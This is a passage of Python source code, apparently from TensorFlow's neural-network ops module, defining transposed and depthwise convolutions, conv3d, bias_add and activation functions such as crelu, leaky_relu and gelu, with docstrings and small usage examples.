than one, or if the output_shape is not a tensor with 4 elements.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "atrous_conv2d_transpose",
[value, filters, output_shape]) as name:
value = ops.convert_to_tensor(value, name="value")
filters = ops.convert_to_tensor(filters, name="filters")
if not value.get_shape().dims[3].is_compatible_with(filters.get_shape()[3]):
raise ValueError(
"value's input channels does not match filters' input channels, "
"{} != {}".format(value.get_shape()[3],
filters.get_shape()[3]))
if rate < 1:
raise ValueError("rate {} cannot be less than one".format(rate))
if rate == 1:
return conv2d_transpose(
value,
filters,
output_shape,
strides=[1, 1, 1, 1],
padding=padding,
data_format="NHWC")
output_shape_ = ops.convert_to_tensor(output_shape, name="output_shape")
if not output_shape_.get_shape().is_compatible_with(
tensor_shape.TensorShape([4])):
raise ValueError("output_shape must have shape (4,), got {}".format(
output_shape_.get_shape()))
if isinstance(output_shape, tuple):
output_shape = list(output_shape)
if isinstance(output_shape, (list, np.ndarray)):
# output_shape's shape should be == [4] if reached this point.
if not filters.get_shape().dims[2].is_compatible_with(output_shape[3]):
raise ValueError(
"output_shape does not match filter's output channels, "
"{} != {}".format(output_shape[3],
filters.get_shape()[2]))
# We have two padding contributions. The first is used for converting "SAME"
# to "VALID". The second is required so that the height and width of the
# zero-padded value tensor are multiples of rate.
# Padding required to reduce to "VALID" convolution
if padding == "SAME":
# Handle filters whose shape is unknown during graph creation.
if filters.get_shape().is_fully_defined():
filter_shape = filters.get_shape().as_list()
else:
filter_shape = array_ops.shape(filters)
filter_height, filter_width = filter_shape[0], filter_shape[1]
# Spatial dimensions of the filters and the upsampled filters in which we
# introduce (rate - 1) zeros between consecutive filter values.
filter_height_up = filter_height + (filter_height - 1) * (rate - 1)
filter_width_up = filter_width + (filter_width - 1) * (rate - 1)
pad_height = filter_height_up - 1
pad_width = filter_width_up - 1
# When pad_height (pad_width) is odd, we pad more to bottom (right),
# following the same convention as conv2d().
pad_top = pad_height // 2
pad_bottom = pad_height - pad_top
pad_left = pad_width // 2
pad_right = pad_width - pad_left
elif padding == "VALID":
pad_top = 0
pad_bottom = 0
pad_left = 0
pad_right = 0
else:
raise ValueError("padding must be either VALID or SAME:"
" {}".format(padding))
in_height = output_shape[1] + pad_top + pad_bottom
in_width = output_shape[2] + pad_left + pad_right
# More padding so that rate divides the height and width of the input.
pad_bottom_extra = (rate - in_height % rate) % rate
pad_right_extra = (rate - in_width % rate) % rate
# The paddings argument to space_to_batch is just the extra padding
# component.
space_to_batch_pad = [[0, pad_bottom_extra], [0, pad_right_extra]]
value = array_ops.space_to_batch(
input=value, paddings=space_to_batch_pad, block_size=rate)
input_sizes = [
rate * rate * output_shape[0], (in_height + pad_bottom_extra) // rate,
(in_width + pad_right_extra) // rate, output_shape[3]
]
value = gen_nn_ops.conv2d_backprop_input(
input_sizes=input_sizes,
filter=filters,
out_backprop=value,
strides=[1, 1, 1, 1],
padding="VALID",
data_format="NHWC")
# The crops argument to batch_to_space includes both padding components.
batch_to_space_crop = [[pad_top, pad_bottom + pad_bottom_extra],
[pad_left, pad_right + pad_right_extra]]
return array_ops.batch_to_space(
input=value, crops=batch_to_space_crop, block_size=rate)
@tf_export(v1=["nn.depthwise_conv2d_native"])
@dispatch.add_dispatch_support
@deprecation.deprecated_endpoints("nn.depthwise_conv2d_native")
def depthwise_conv2d_native( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter,
strides,
padding,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes a 2-D depthwise convolution.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, channel_multiplier]`, containing
`in_channels` convolutional filters of depth 1, `depthwise_conv2d` applies
a different filter to each input channel (expanding from 1 channel to
`channel_multiplier` channels for each), then concatenates the results
together. Thus, the output has `in_channels * channel_multiplier` channels.
```
for k in 0..in_channels-1
for q in 0..channel_multiplier-1
output[b, i, j, k * channel_multiplier + q] =
sum_{di, dj} input[b, strides[1] * i + di, strides[2] * j + dj, k] *
filter[di, dj, k, q]
```
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
  horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
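  A small illustrative example (arbitrary all-ones tensors) showing the output
  depth of `in_channels * channel_multiplier`:
  >>> x = tf.ones([1, 4, 4, 3])
  >>> f = tf.ones([2, 2, 3, 2])   # [height, width, in_channels, channel_multiplier]
  >>> tf.compat.v1.nn.depthwise_conv2d_native(x, f, strides=[1, 1, 1, 1],
  ...     padding='VALID').shape
  TensorShape([1, 3, 3, 6])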
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`,
`float32`, `float64`.
filter: A `Tensor`. Must have the same type as `input`.
strides: A list of `ints`. 1-D of length 4. The stride of the sliding
window for each dimension of `input`.
padding: Controls how to pad the image before applying the convolution. Can
be the string `"SAME"` or `"VALID"` indicating the type of padding
algorithm to use, or a list indicating the explicit paddings at the start
and end of each dimension. When explicit padding is used and data_format
is `"NHWC"`, this should be in the form `[[0, 0], [pad_top, pad_bottom],
[pad_left, pad_right], [0, 0]]`. When explicit padding used and
data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to
`"NHWC"`. Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of: [batch, height,
width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`. 1-D
tensor of length 4. The dilation factor for each dimension of `input`. If
set to k > 1, there will be k-1 skipped cells between each filter element
on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.depthwise_conv2d_native(
input,
filter,
strides,
padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export(
"nn.depthwise_conv2d_backprop_input",
v1=[
"nn.depthwise_conv2d_native_backprop_input",
"nn.depthwise_conv2d_backprop_input"
])
@dispatch.add_dispatch_support
@deprecation.deprecated_endpoints("nn.depthwise_conv2d_native_backprop_input")
def depthwise_conv2d_native_backprop_input( # pylint: disable=redefined-builtin,dangerous-default-value
input_sizes,
filter,
out_backprop,
strides,
padding,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes the gradients of depthwise convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`. An integer vector representing the
shape of `input`, based on `data_format`. For example, if `data_format`
is 'NHWC' then `input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`,
`float32`, `float64`. 4-D with shape `[filter_height, filter_width,
in_channels, depthwise_multiplier]`.
out_backprop: A `Tensor`. Must have the same type as `filter`. 4-D with
shape based on `data_format`. For example, if `data_format` is 'NHWC'
then out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`. The stride of the sliding window for each
dimension of the input of the convolution.
padding: Controls how to pad the image before applying the convolution. Can
be the string `"SAME"` or `"VALID"` indicating the type of padding
algorithm to use, or a list indicating the explicit paddings at the start
and end of each dimension. When explicit padding is used and data_format
is `"NHWC"`, this should be in the form `[[0, 0], [pad_top, pad_bottom],
[pad_left, pad_right], [0, 0]]`. When explicit padding used and
data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to
`"NHWC"`. Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of: [batch, height,
width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`. 1-D
tensor of length 4. The dilation factor for each dimension of `input`. If
set to k > 1, there will be k-1 skipped cells between each filter element
on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.depthwise_conv2d_native_backprop_input(
input_sizes,
filter,
out_backprop,
strides,
padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export(
"nn.depthwise_conv2d_backprop_filter",
v1=[
"nn.depthwise_conv2d_native_backprop_filter",
"nn.depthwise_conv2d_backprop_filter"
])
@dispatch.add_dispatch_support
@deprecation.deprecated_endpoints("nn.depthwise_conv2d_native_backprop_filter")
def depthwise_conv2d_native_backprop_filter( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter_sizes,
out_backprop,
strides,
padding,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes the gradients of depthwise convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`,
`float32`, `float64`. 4-D with shape based on `data_format`. For example,
if `data_format` is 'NHWC' then `input` is a 4-D `[batch, in_height,
in_width, in_channels]` tensor.
filter_sizes: A `Tensor` of type `int32`. An integer vector representing the
tensor shape of `filter`, where `filter` is a 4-D `[filter_height,
filter_width, in_channels, depthwise_multiplier]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`. 4-D with shape
based on `data_format`. For example, if `data_format` is 'NHWC' then
out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`. The stride of the sliding window for each
dimension of the input of the convolution.
padding: Controls how to pad the image before applying the convolution. Can
be the string `"SAME"` or `"VALID"` indicating the type of padding
algorithm to use, or a list indicating the explicit paddings at the start
and end of each dimension. When explicit padding is used and data_format
is `"NHWC"`, this should be in the form `[[0, 0], [pad_top, pad_bottom],
[pad_left, pad_right], [0, 0]]`. When explicit padding used and
data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to
`"NHWC"`. Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of: [batch, height,
width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`. 1-D
tensor of length 4. The dilation factor for each dimension of `input`. If
set to k > 1, there will be k-1 skipped cells between each filter element
on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.depthwise_conv2d_native_backprop_filter(
input,
filter_sizes,
out_backprop,
strides,
padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
def _conv3d_expanded_batch(
input, # pylint: disable=redefined-builtin
filter, # pylint: disable=redefined-builtin
strides,
padding,
data_format,
dilations=None,
name=None):
"""Helper function for `conv3d`; handles expanded batches."""
shape = input.shape
# shape object may lack ndims, e.g., if input is an np.ndarray. In that case,
# we fall back to len(shape).
ndims = getattr(shape, "ndims", -1)
if ndims == -1:
ndims = len(shape)
if ndims in (5, 4, 3, 2, 1, 0, None):
# We avoid calling squeeze_batch_dims to reduce extra python function
# call slowdown in eager mode. This branch doesn't require reshapes.
return gen_nn_ops.conv3d(
input,
filter,
strides,
padding,
data_format=data_format,
dilations=dilations,
name=name)
else:
return squeeze_batch_dims(
input,
functools.partial(
gen_nn_ops.conv3d,
filter=filter,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations),
inner_rank=4,
name=name)
@tf_export("nn.conv3d", v1=[])
@dispatch.add_dispatch_support
def conv3d_v2(input, # pylint: disable=redefined-builtin,missing-docstring
filters,
strides,
padding,
data_format="NDHWC",
dilations=None,
name=None):
if dilations is None:
dilations = [1, 1, 1, 1, 1]
return _conv3d_expanded_batch(input, filters, strides, padding, data_format,
dilations, name)
@tf_export(v1=["nn.conv3d"])
@dispatch.add_dispatch_support
def conv3d_v1( # pylint: disable=missing-docstring,dangerous-default-value
input, # pylint: disable=redefined-builtin
filter=None, # pylint: disable=redefined-builtin
strides=None,
padding=None,
data_format="NDHWC",
dilations=[1, 1, 1, 1, 1],
name=None,
filters=None):
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
return gen_nn_ops.conv3d(
input, filter, strides, padding, data_format, dilations, name)
conv3d_v2.__doc__ = deprecation.rewrite_argument_docstring(
gen_nn_ops.conv3d.__doc__, "filter", "filters")
conv3d_v1.__doc__ = gen_nn_ops.conv3d.__doc__
@tf_export(v1=["nn.conv3d_transpose"])
@dispatch.add_dispatch_support
def conv3d_transpose(
value,
filter=None, # pylint: disable=redefined-builtin
output_shape=None,
strides=None,
padding="SAME",
data_format="NDHWC",
name=None,
input=None, # pylint: disable=redefined-builtin
filters=None,
dilations=None):
"""The transpose of `conv3d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv3d`
rather than an actual deconvolution.
Args:
value: A 5-D `Tensor` of type `float` and shape
`[batch, depth, height, width, in_channels]`.
filter: A 5-D `Tensor` with the same type as `value` and shape
`[depth, height, width, output_channels, in_channels]`. `filter`'s
`in_channels` dimension must match that of `value`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: A list of ints. The stride of the sliding window for each
dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
    data_format: A string, either `'NDHWC'` or `'NCDHW'` specifying the layout
of the input and output tensors. Defaults to `'NDHWC'`.
name: Optional name for the returned tensor.
input: Alias of value.
filters: Alias of filter.
    dilations: An int or list of `ints` that has length `1`, `3` or `5`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
      single value is given it is replicated in the `D`, `H` and `W` dimension.
      By default the `N` and `C` dimensions are set to 1. If set to k > 1, there
      will be k-1 skipped cells between each filter element on that dimension.
      The dimension order is determined by the value of `data_format`, see
      above for details. If a 5-d tensor is given, the dilations in the batch
      and depth dimensions must be 1.
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
value = deprecated_argument_lookup("input", input, "value", value)
return conv3d_transpose_v2(
value,
filter,
output_shape,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export("nn.conv3d_transpose", v1=[])
@dispatch.add_dispatch_support
def conv3d_transpose_v2(input, # pylint: disable=redefined-builtin
filters,
output_shape,
strides,
padding="SAME",
data_format="NDHWC",
dilations=None,
name=None):
"""The transpose of `conv3d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv3d`
rather than an actual deconvolution.
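  A small illustrative example (arbitrary all-ones tensors) with the default
  `'SAME'` padding:
  >>> x = tf.ones([1, 4, 4, 4, 3])
  >>> f = tf.ones([3, 3, 3, 8, 3])  # [depth, height, width, out_channels, in_channels]
  >>> tf.nn.conv3d_transpose(x, f, output_shape=[1, 8, 8, 8, 8], strides=2).shape
  TensorShape([1, 8, 8, 8, 8])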
Args:
input: A 5-D `Tensor` of type `float` and shape `[batch, depth, height,
width, in_channels]` for `NDHWC` data format or `[batch, in_channels,
depth, height, width]` for `NCDHW` data format.
filters: A 5-D `Tensor` with the same type as `input` and shape `[depth,
height, width, output_channels, in_channels]`. `filter`'s `in_channels`
dimension must match that of `input`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `3` or `5`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `D`, `H` and `W` dimension. By
      default the `N` and `C` dimensions are set to 1. The dimension order is
determined by the value of `data_format`, see below for details.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NDHWC' and 'NCDHW' are supported.
    dilations: An int or list of `ints` that has length `1`, `3` or `5`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
      single value is given it is replicated in the `D`, `H` and `W` dimension.
      By default the `N` and `C` dimensions are set to 1. If set to k > 1, there
      will be k-1 skipped cells between each filter element on that dimension.
      The dimension order is determined by the value of `data_format`, see
      above for details. If a 5-d tensor is given, the dilations in the batch
      and depth dimensions must be 1.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `input`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv3d_transpose",
                      [input, filters, output_shape]) as name:
if data_format is None:
data_format = "NDHWC"
channel_index = 1 if data_format.startswith("NC") else 4
strides = _get_sequence(strides, 3, channel_index, "strides")
dilations = _get_sequence(dilations, 3, channel_index, "dilations")
return gen_nn_ops.conv3d_backprop_input_v2(
input_sizes=output_shape,
filter=filters,
out_backprop=input,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
CONV_TRANSPOSE_OPS = (
conv1d_transpose,
conv2d_transpose_v2,
conv3d_transpose_v2,
)
@tf_export("nn.conv_transpose")
@dispatch.add_dispatch_support
def conv_transpose(input, # pylint: disable=redefined-builtin
filters,
output_shape,
strides,
padding="SAME",
data_format=None,
dilations=None,
name=None):
"""The transpose of `convolution`.
This operation is sometimes called "deconvolution" after
  (Zeiler et al., 2010), but is really the transpose (gradient) of `convolution`
rather than an actual deconvolution.
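  A small illustrative example (arbitrary all-ones tensors); the length of
  `output_shape` selects the 1-D, 2-D or 3-D transpose op:
  >>> x = tf.ones([1, 4, 3])
  >>> f = tf.ones([2, 5, 3])   # [filter_width, output_channels, in_channels]
  >>> tf.nn.conv_transpose(x, f, output_shape=[1, 8, 5], strides=2).shape
  TensorShape([1, 8, 5])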
Args:
input: An N+2 dimensional `Tensor` of shape
`[batch_size] + input_spatial_shape + [in_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, in_channels] + input_spatial_shape` if data_format starts
with "NC". It must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
filters: An N+2 dimensional `Tensor` with the same type as `input` and
shape `spatial_filter_shape + [in_channels, out_channels]`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `N` or `N+2`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the spatial dimensions. By default
      the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilations: An int or list of `ints` that has length `1`, `N` or `N+2`,
      defaults to 1. The dilation factor for each dimension of `input`. If a
single value is given it is replicated in the spatial dimensions. By
default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details.
name: A name for the operation (optional). If not specified "conv_transpose"
is used.
Returns:
    A `Tensor` with the same type as `input`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv_transpose",
                      [input, filters, output_shape]) as name:
if tensor_util.is_tf_type(output_shape):
n = output_shape.shape[0] - 2
elif isinstance(output_shape, collections_abc.Sized):
n = len(output_shape) - 2
else:
raise ValueError("output_shape must be a tensor or sized collection.")
if not 1 <= n <= 3:
raise ValueError(
"output_shape must be of length 3, 4 or 5 but was {}.".format(n + 2))
op = CONV_TRANSPOSE_OPS[n-1]
return op(
input,
filters,
output_shape,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
def _tf_deterministic_ops():
if _tf_deterministic_ops.value is None:
tf_deterministic_ops = os.environ.get("TF_DETERMINISTIC_OPS")
if tf_deterministic_ops is not None:
tf_deterministic_ops = tf_deterministic_ops.lower()
_tf_deterministic_ops.value = (
tf_deterministic_ops == "true" or tf_deterministic_ops == "1")
return _tf_deterministic_ops.value
_tf_deterministic_ops.value = None
@tf_export("nn.bias_add")
@dispatch.add_dispatch_support
def bias_add(value, bias, data_format=None, name=None):
"""Adds `bias` to `value`.
This is (mostly) a special case of `tf.add` where `bias` is restricted to 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Unlike `tf.add`, the type of `bias` is allowed to differ from `value` in the
case where both types are quantized.
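  For example, with the default channels-last layout `bias` is broadcast along
  the last dimension (values chosen arbitrarily):
  >>> x = tf.ones([2, 3, 4])
  >>> b = tf.constant([1., 2., 3., 4.])
  >>> tf.nn.bias_add(x, b)[0, 0].numpy().tolist()
  [2.0, 3.0, 4.0, 5.0]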
Args:
value: A `Tensor` with type `float`, `double`, `int64`, `int32`, `uint8`,
`int16`, `int8`, `complex64`, or `complex128`.
bias: A 1-D `Tensor` with size matching the channel dimension of `value`.
Must be the same type as `value` unless `value` is a quantized type,
in which case a different quantized type may be used.
data_format: A string. 'N...C' and 'NC...' are supported. If `None` (the
      default) is specified then 'N...C' is assumed.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `value`.
Raises:
    ValueError: If the data format is unrecognized, if `value` has less than
      two dimensions when `data_format` is 'N...C'/`None` or less than three
      dimensions when `data_format` is 'NC...', if `bias` does not have
      exactly one dimension (i.e. is not a vector), or if the size of `bias`
      does not match the size of the channel dimension of `value`.
"""
with ops.name_scope(name, "BiasAdd", [value, bias]) as name:
if data_format is not None:
if data_format.startswith("NC"):
data_format = "NCHW"
elif data_format.startswith("N") and data_format.endswith("C"):
data_format = "NHWC"
else:
raise ValueError("data_format must be of the form `N...C` or `NC...`")
if not context.executing_eagerly():
value = ops.convert_to_tensor(value, name="input")
bias = ops.convert_to_tensor(bias, dtype=value.dtype, name="bias")
# TODO(duncanriach): Implement deterministic functionality at CUDA kernel
# level.
if _tf_deterministic_ops():
# Note that this code does not implement the same error checks as the
# pre-existing C++ ops.
if data_format == "NCHW":
broadcast_shape_head = [1, array_ops.size(bias)]
broadcast_shape_tail = array_ops.ones(
array_ops.rank(value) - 2, dtype=dtypes.int32)
broadcast_shape = array_ops.concat(
[broadcast_shape_head, broadcast_shape_tail], 0)
return math_ops.add(
value, array_ops.reshape(bias, broadcast_shape), name=name)
else: # data_format == 'NHWC' or data_format == None
return math_ops.add(value, bias, name=name)
else:
return gen_nn_ops.bias_add(
value, bias, data_format=data_format, name=name)
def bias_add_v1(value, bias, name=None):
"""Adds `bias` to `value`.
  This is a deprecated version of bias_add and will soon be removed.
This is (mostly) a special case of `tf.add` where `bias` is restricted to 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Unlike `tf.add`, the type of `bias` is allowed to differ from `value` in the
case where both types are quantized.
Args:
value: A `Tensor` with type `float`, `double`, `int64`, `int32`, `uint8`,
`int16`, `int8`, `complex64`, or `complex128`.
bias: A 1-D `Tensor` with size matching the last dimension of `value`.
Must be the same type as `value` unless `value` is a quantized type,
in which case a different quantized type may be used.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `value`.
"""
with ops.name_scope(name, "BiasAddV1", [value, bias]) as name:
value = ops.convert_to_tensor(value, name="input")
bias = ops.convert_to_tensor(bias, dtype=value.dtype, name="bias")
return gen_nn_ops.bias_add_v1(value, bias, name=name)
@tf_export(v1=["nn.crelu"])
@dispatch.add_dispatch_support
def crelu(features, name=None, axis=-1):
"""Computes Concatenated ReLU.
Concatenates a ReLU which selects only the positive part of the activation
with a ReLU which selects only the *negative* part of the activation.
Note that as a result this non-linearity doubles the depth of the activations.
Source: [Understanding and Improving Convolutional Neural Networks via
Concatenated Rectified Linear Units. W. Shang, et
al.](https://arxiv.org/abs/1603.05201)
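  For example (arbitrary values):
  >>> tf.nn.crelu(tf.constant([-1., 2., -3.])).numpy().tolist()
  [0.0, 2.0, 0.0, 1.0, 0.0, 3.0]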
Args:
features: A `Tensor` with type `float`, `double`, `int32`, `int64`, `uint8`,
`int16`, or `int8`.
name: A name for the operation (optional).
axis: The axis that the output values are concatenated along. Default is -1.
Returns:
A `Tensor` with the same type as `features`.
References:
Understanding and Improving Convolutional Neural Networks via Concatenated
Rectified Linear Units:
[Shang et al., 2016](http://proceedings.mlr.press/v48/shang16)
([pdf](http://proceedings.mlr.press/v48/shang16.pdf))
"""
with ops.name_scope(name, "CRelu", [features]) as name:
features = ops.convert_to_tensor(features, name="features")
c = array_ops.concat([features, -features], axis, name=name) # pylint: disable=invalid-unary-operand-type
return gen_nn_ops.relu(c)
@tf_export("nn.crelu", v1=[])
@dispatch.add_dispatch_support
def crelu_v2(features, axis=-1, name=None):
return crelu(features, name=name, axis=axis)
crelu_v2.__doc__ = crelu.__doc__
@tf_export("nn.relu6")
@dispatch.add_dispatch_support
def relu6(features, name=None):
"""Computes Rectified Linear 6: `min(max(features, 0), 6)`.
Args:
features: A `Tensor` with type `float`, `double`, `int32`, `int64`, `uint8`,
`int16`, or `int8`.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `features`.
References:
Convolutional Deep Belief Networks on CIFAR-10:
Krizhevsky et al., 2010
([pdf](http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf))
"""
with ops.name_scope(name, "Relu6", [features]) as name:
features = ops.convert_to_tensor(features, name="features")
return gen_nn_ops.relu6(features, name=name)
@tf_export("nn.leaky_relu")
@dispatch.add_dispatch_support
def leaky_relu(features, alpha=0.2, name=None):
"""Compute the Leaky ReLU activation function.
Source: [Rectifier Nonlinearities Improve Neural Network Acoustic Models.
AL Maas, AY Hannun, AY Ng - Proc. ICML, 2013]
(https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf).
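  For example (arbitrary values and slope):
  >>> tf.nn.leaky_relu(tf.constant([-2., 0., 3.]), alpha=0.5).numpy().tolist()
  [-1.0, 0.0, 3.0]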
Args:
features: A `Tensor` representing preactivation values. Must be one of
the following types: `float16`, `float32`, `float64`, `int32`, `int64`.
alpha: Slope of the activation function at x < 0.
name: A name for the operation (optional).
Returns:
The activation value.
References:
Rectifier Nonlinearities Improve Neural Network Acoustic Models:
[Maas et al., 2013]
(http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.693.1422)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.693.1422&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "LeakyRelu", [features, alpha]) as name:
features = ops.convert_to_tensor(features, name="features")
if features.dtype.is_integer:
features = math_ops.cast(features, dtypes.float32)
if isinstance(alpha, np.ndarray):
alpha = alpha.item()
return gen_nn_ops.leaky_relu(features, alpha=alpha, name=name)
@tf_export("nn.gelu", v1=[])
@dispatch.add_dispatch_support
def gelu(features, approximate=False, name=None):
"""Compute the Gaussian Error Linear Unit (GELU) activation function.
Gaussian error linear unit (GELU) computes
  `x * P(X <= x)`, where `X ~ N(0, 1)`.
The (GELU) nonlinearity weights inputs by their value, rather than gates
inputs by their sign as in ReLU.
For example:
>>> x = tf.constant([-3.0, -1.0, 0.0, 1.0, 3.0], dtype=tf.float32)
>>> y = tf.nn.gelu(x)
>>> y.numpy()
array([-0.00404951, -0.15865529, 0. , 0.8413447 , 2.9959507 ],
dtype=float32)
>>> y = tf.nn.gelu(x, approximate=True)
>>> y.numpy()
array([-0.00363752, -0.15880796, 0. , 0.841192 , 2.9963627 ],
dtype=float32)
Args:
features: A `Tensor` representing preactivation values.
approximate: An optional `bool`. Defaults to `False`. Whether to enable
approximation.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `features`.
References:
[Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415).
"""
with ops.name_scope(name, "Gelu", [features]):
features = ops.convert_to_tensor(features, name="features")
if approximate:
coeff = math_ops.cast(0.044715, features.dtype)
return 0.5 * features * (
1.0 + math_ops.tanh(0.7978845608028654 *
(features + coeff * math_ops.pow(features, 3))))
else:
return 0.5 * features * (1.0 + math_ops.erf(
features / math_ops.cast(1.4142135623730951, features.dtype)))
def _flatten_outer_dims(logits):
"""Flattens logits' outer dimensions and keep its last dimension."""
rank = array_ops.rank(logits)
last_dim_size = array_ops.slice(
array_ops.shape(logits), [math_ops.subtract(rank, 1)], [1])
output = array_ops.reshape(logits, array_ops.concat([[-1], last_dim_size], 0))
# Set output shape if known.
if not context.executing_eagerly():
shape = logits.get_shape()
if shape is not None and shape.dims is not None:
shape = shape.as_list()
product = 1
product_valid = True
for d in shape[:-1]:
if d is None:
product_valid = False
break
else:
product *= d
if product_valid:
output_shape = [product, shape[-1]]
